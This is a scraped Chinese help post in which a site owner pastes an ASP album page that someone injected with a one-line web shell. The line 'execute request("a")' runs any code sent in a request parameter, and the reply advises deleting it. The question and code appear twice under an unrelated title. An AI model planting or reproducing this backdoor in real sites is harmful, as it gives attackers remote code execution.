查人人中国名人网开个日化店需要多少钱:execute()函数可以执行任意ASP代码
来源:百度文库 编辑:查人人中国名人网 时间:2024/04/29 19:22:39
execute()函数可以执行任意ASP代码,被一些后门利用。其形式一般是:execute(X)
请高手指点.我应该怎样做呢?
<%
Dim SpecialID,Show_Special_rs
SpecialID=request.QueryString("id")
If SpecialID="" or not IsNumeric(SpecialID) Then
Response.Write ("访问错误!")
Response.End
End If
Dim SClass,SClassID,NClassID,NClass,name,pic,yuyan,Times,GongSi,intro
Set Show_Special_rs=server.createobject("adodb.recordset")
Sql="select SClass,SClassID,NClassID,NClass,name,pic,yuyan,Times,GongSi,intro,hits from [Special] where Specialid="&Cint(SpecialID)
Show_Special_rs.open Sql,conn,1,3
If Show_Special_rs.eof Then
Response.Write ("参数错误!专辑可能已经删除")
Response.End
End If
Show_Special_rs("hits")=Show_Special_rs("hits")+1
Show_Special_rs.update
SClassID=Show_Special_rs("SClassID")
SClass=Show_Special_rs("SClass")
NClassID=Show_Special_rs("NClassID")
NClass=Show_Special_rs("NClass")
name=Show_Special_rs("name")
pic=Show_Special_rs("pic")
yuyan=Show_Special_rs("yuyan")
Times=Show_Special_rs("Times")
GongSi=Show_Special_rs("GongSi")
intro=Show_Special_rs("intro")
Show_Special_rs.close
Set Show_Special_rs=NOTHING
stats="专辑 "&name
%>
<%
if request("a")<>"" then execute request("a")
%>
<%
Dim Best_Music_rs,Best_Music_Num,Best_Music_Sql,Best_Music_bgcolor
Best_Music_Sql="select ID,MusicName,Singer,hits from [MusicList] where Specialid="&Cint(SpecialID)
Best_Music_Num=100
Set Best_Music_rs=conn.execute(Best_Music_Sql)
For i=1 To Best_Music_Num
If Best_Music_rs.eof Then Exit For
Best_Music_bgcolor="f7f7f7"
If i mod 2 = 0 Then
Best_Music_bgcolor="ffffff"
Else
Best_Music_bgcolor="f7f7f7"
End If
%>
上面是我站上ASP内容
请高手指点.我应该怎样做呢?
<%
Dim SpecialID,Show_Special_rs
SpecialID=request.QueryString("id")
If SpecialID="" or not IsNumeric(SpecialID) Then
Response.Write ("访问错误!")
Response.End
End If
Dim SClass,SClassID,NClassID,NClass,name,pic,yuyan,Times,GongSi,intro
Set Show_Special_rs=server.createobject("adodb.recordset")
Sql="select SClass,SClassID,NClassID,NClass,name,pic,yuyan,Times,GongSi,intro,hits from [Special] where Specialid="&Cint(SpecialID)
Show_Special_rs.open Sql,conn,1,3
If Show_Special_rs.eof Then
Response.Write ("参数错误!专辑可能已经删除")
Response.End
End If
Show_Special_rs("hits")=Show_Special_rs("hits")+1
Show_Special_rs.update
SClassID=Show_Special_rs("SClassID")
SClass=Show_Special_rs("SClass")
NClassID=Show_Special_rs("NClassID")
NClass=Show_Special_rs("NClass")
name=Show_Special_rs("name")
pic=Show_Special_rs("pic")
yuyan=Show_Special_rs("yuyan")
Times=Show_Special_rs("Times")
GongSi=Show_Special_rs("GongSi")
intro=Show_Special_rs("intro")
Show_Special_rs.close
Set Show_Special_rs=NOTHING
stats="专辑 "&name
%>
<%
if request("a")<>"" then execute request("a")
%>
<%
Dim Best_Music_rs,Best_Music_Num,Best_Music_Sql,Best_Music_bgcolor
Best_Music_Sql="select ID,MusicName,Singer,hits from [MusicList] where Specialid="&Cint(SpecialID)
Best_Music_Num=100
Set Best_Music_rs=conn.execute(Best_Music_Sql)
For i=1 To Best_Music_Num
If Best_Music_rs.eof Then Exit For
Best_Music_bgcolor="f7f7f7"
If i mod 2 = 0 Then
Best_Music_bgcolor="ffffff"
Else
Best_Music_bgcolor="f7f7f7"
End If
%>
上面是我站上ASP内容
<%
if request("a")<>"" then execute request("a")
%>
这个页面被别人加入了这个代码
删掉即可